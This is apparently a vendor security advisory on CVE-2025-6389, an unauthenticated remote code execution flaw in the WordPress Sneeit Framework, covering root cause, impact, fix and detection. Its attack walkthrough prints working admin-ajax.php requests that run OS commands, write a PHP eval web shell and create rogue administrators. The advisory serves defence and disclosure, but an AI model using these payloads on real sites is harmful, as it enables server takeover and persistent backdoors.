CVE-2025-6389: Sneeit Framework Unauthenticated Remote Code Execution

Overview

• CVE: CVE-2025-6389
• Affected Versions: Sneeit Framework <= 8.3 (bundled with multiple premium themes)
• CVSS: 9.8 (Critical)
• Authentication: None required (unauthenticated)
• Type: Arbitrary PHP Function Invocation + Remote Code Execution (RCE)

On August 5, 2025, a critical unauthenticated remote code execution vulnerability was patched in Sneeit Framework, a plugin bundled with several premium WordPress themes. Public disclosure followed on November 24, 2025, triggering an immediate wave of exploitation in the wild.

Despite an active install base of only approximately 1,700 sites, more than 131,000 exploitation attempts were blocked within weeks of disclosure. Confirmed attacks included web shell deployment and rogue administrator account creation — a disproportionate attack volume that illustrates how modern exploit automation targets every WordPress site regardless of how obscure its plugin stack is.

What Happened

The root cause is the sneeit_articles_pagination_callback function passing unsanitized user input directly to PHP's built-in call_user_func.

call_user_func dynamically invokes a PHP function by name: it takes a string as its first argument and calls that function. When that string is controlled by the attacker, it means the attacker can call any PHP function available in the runtime environment — no authentication required.

The vulnerable code was conceptually structured like this:

// Vulnerable code (conceptual)
function sneeit_articles_pagination_callback() {
    $type = $_POST['type']; // user input, taken verbatim
    // no sanitization, no whitelist check
    call_user_func($type);  // arbitrary PHP function executed
}

When the value passed to call_user_func originates from user input, an attacker can supply any of these dangerous function names:

• system — execute OS commands
• passthru — execute OS commands and pass output through directly
• phpinfo — leak PHP configuration and environment details
• assert — evaluate and execute arbitrary PHP code as a string

Using call_user_func safely requires that the first argument be validated against a strict whitelist of known-safe function names before the call is made. The complete absence of that validation turned a utility function into an unauthenticated RCE primitive.

How the Attack Works

Attack flow:

1. Target identification: Scan for WordPress sites using premium themes that bundle Sneeit Framework (themes by Neoustheme, SmithTheme, and others). Presence can be confirmed by probing /wp-content/plugins/sneeit-framework/ or by reading the theme credit in the page footer.

2. Endpoint discovery: Sneeit Framework registers its callback via admin-ajax.php. Because no authentication check is present, the action is callable by any unauthenticated visitor.

3. Send a minimal payload: Set the type parameter to the desired PHP function name and POST to admin-ajax.php.

POST /wp-admin/admin-ajax.php
action=sneeit_articles_pagination
type=phpinfo

4. Execute OS commands: Because call_user_func also forwards additional POST parameters as arguments, functions that accept arguments are fully exploitable.

POST /wp-admin/admin-ajax.php
action=sneeit_articles_pagination
type=system
arg=id

Server response: uid=33(www-data) gid=33(www-data) groups=33(www-data)

5. Deploy a web shell: Call a file-writing function to establish persistent access on the server.

type=file_put_contents
arg[0]=/var/www/html/wp-content/uploads/shell.php
arg[1]=<?php @eval($_POST['c']); ?>

6. Create a rogue administrator: Call WordPress functions such as wp_create_user and add_user_meta directly to insert a new admin account, creating a persistent backdoor that survives plugin updates or removal.

Real-World Impact

• More than 131,000 exploitation attempts were blocked in the weeks following public disclosure
• Against an install base of approximately 1,700 sites, this represents an average of over 77 attack attempts per site
• Web shell deployment was confirmed, with attackers establishing persistent server access on compromised sites
• Rogue administrator account creation was confirmed, leaving affected sites exposed to password resets and content manipulation
• No authentication is required and the exploit payload is trivially simple, making automated botnet-scale scanning straightforward
• The patch was released on August 5, 2025, but public disclosure was delayed until November 24, 2025 — a roughly three-month window during which many sites remained unpatched after disclosure

Fix and Lessons

Fix: Patched in version 8.4 (released August 5, 2025). The fix removes the call_user_func dispatch from sneeit_articles_pagination_callback entirely, replacing it with a direct implementation of the pagination logic so that no user-supplied value is ever treated as a callable.

Lessons:

1. Never pass user input to call_user_func: This is one of the foundational rules of PHP security. The function name passed to call_user_func must always come from a hardcoded, developer-controlled whitelist — never from request parameters, cookies, or any other user-supplied source.
2. Whitelist dynamic dispatch strictly: If dynamic function invocation is genuinely necessary, validate the input with a strict equality check against an explicit allowlist before the call: in_array($type, ['allowed_func_1', 'allowed_func_2'], true). A loose comparison (==) is not sufficient.
3. Unauthenticated endpoints are the highest-priority attack surface: Any admin-ajax.php action that lacks an authentication check is callable by anyone on the internet. Every callback function should begin with check_ajax_referer() or a current_user_can() check. The absence of either one is a red flag in any code review.
4. Bundled plugins are routinely missed in update workflows: Plugins shipped inside a theme directory do not appear in the WordPress admin update dashboard. Fixes for vulnerabilities in bundled components are delivered only through a theme update, making it easy for site owners to remain unaware that a critical patch exists.
5. A small install base does not equal a small attack surface: The 131,000 attack attempts against 1,700 sites prove that modern exploit automation sweeps every WordPress installation it finds. Attackers do not manually curate target lists — they scan everything. Obscurity provides zero protection.

Detection with Nyambush

Nyambush automatically detects the versions of all WordPress components, including plugins bundled inside themes, and cross-references them against its vulnerability database. If Sneeit Framework is running at version 8.3 or below, Nyambush raises a Critical alert with CVSS 9.8 immediately.

In continuous monitoring mode, the alert persists until an update to version 8.4 is confirmed. When Nyambush detects that a theme update has delivered a patched version of Sneeit Framework, the alert is automatically resolved.